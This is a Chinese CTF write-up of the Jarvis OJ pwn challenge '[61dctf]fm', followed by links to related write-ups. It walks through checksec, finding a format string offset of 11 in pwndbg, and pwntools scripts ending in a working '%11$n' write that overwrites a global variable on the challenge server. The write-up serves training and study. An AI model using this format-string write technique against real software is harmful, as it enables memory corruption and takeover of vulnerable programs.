[Jarvis OJ - PWN]——[61dctf]fm

  • 题目地址: https://www.jarvisoj.com/challenges
  • 题目:

    还是先checksec一下, 开启了canary 和NX保护

    在IDA中,查看一下, 这是一道格式化字符串的题。

    找到x的地址

在pwndbg中进行调试一下, 寻找偏移

from pwn import *#p = remote("pwn2.jarvisoj.com",9895)
p = process("./fm")
gdb.attach(p, "b *0x080485AD")
x_addr = 0x0804A02C
payload = 'aaaa' + '%p'
p.sendline(payload)
p.interactive()

找到偏移为 0xb = 11

验证一下

from pwn import *#p = remote("pwn2.jarvisoj.com",9895)
p = process("./fm")
gdb.attach(p, "b *0x080485AD")
x_addr = 0x0804A02C
payload = 'aaaa' + '%11$p'
p.sendline(payload)
p.interactive()

0x61616161其实就是aaaa

因为我们要将x修改为4
所以

exploit

from pwn import *p = remote("pwn2.jarvisoj.com",9895)
#p = process("./fm")
#gdb.attach(p, "b *0x080485AD")
x_addr = 0x0804A02C
payload = p32(x_addr) + '%11$n'p.sendline(payload)
p.interactive()

一道简单的格式化字符串题,希望对你有所帮助

[Jarvis OJ - PWN]——[61dctf]fm相关推荐

  1. [Jarvis OJ - PWN]——Typo(内涵peak小知识)

    [Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...

  2. [Jarvis OJ - PWN]——Backdoor

    [Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...

  3. [Jarvis OJ - PWN]——Test Your Memory

    [Jarvis OJ - PWN]--Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA e ...

  4. [Jarvis OJ - PWN]——[XMAN]level4

    [Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...

  5. [Jarvis OJ - PWN]——Smashes

    [Jarvis OJ - PWN]--Smashes 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下看看.64位,并且除了PIE ...

  6. [Jarvis OJ - PWN]——[XMAN]level3_x64

    [Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...

  7. [Jarvis OJ - PWN]——[XMAN]level3

    [Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...

  8. [Jarvis OJ - PWN]——[XMAN]level2(x64)

    [Jarvis OJ - PWN]--[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序. ...

  9. [Jarvis OJ - PWN]——Tell Me Something

    [Jarvis OJ - PWN]--Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目: 还是先checksec一下,64位开 ...

最新文章

  1. 操作系统安全加固原理
  2. 基于MATLAB的SUI信道模型的理论分析与仿真
  3. 李彦宏:百度吹过的牛逼今天实现了!
  4. 作业 给计算机编号 winform
  5. Linux内核空间内存申请函数kmalloc、kzalloc、vmalloc的区别
  6. canvas中文显示乱码 html5_40个常见的HTML5 面试问题及答案
  7. Leetcode之插入区间
  8. 一个程序员眼中的项目经理
  9. 分享9个ps、pr免费教程网站
  10. wps目录怎么加一条_WPS中如何正确插入目录_WPS怎么做目录
  11. 安装TimeGen波形绘图软件
  12. Windows删除打开方式多余项
  13. 精读《算法 - 动态规划》
  14. 仿淘宝头像上传功能(一)——前端篇。
  15. 行列式的定义及简单计算
  16. linux下设置MySQL密码
  17. 基于时延法的麦克风阵列声源定位分析
  18. CAFFE windows 配置 测试
  19. 70后程序男的成长经历
  20. 存储过程实现银行转账的简易操作

热门文章

  1. js入门系列演示·数组
  2. kali安装tools
  3. 【数据结构与算法】之深入解析“消除游戏”的求解思路与算法示例
  4. 【数据结构与算法】之深入解析“不同的二叉搜索树II”的求解思路与算法示例
  5. iOS经典面试题之深入解析类Class的iskindOfClass与isMemberOfClass的底层原理
  6. 根据使用频率为 5 个字符设计的哈夫曼编码不可能是( )
  7. 学计算机,怎么入门?
  8. Jenkins 创建一个freestyle的Job
  9. 2014\Province_C_C++_B\2 切面条
  10. 【机器视觉】 dev_open_window算子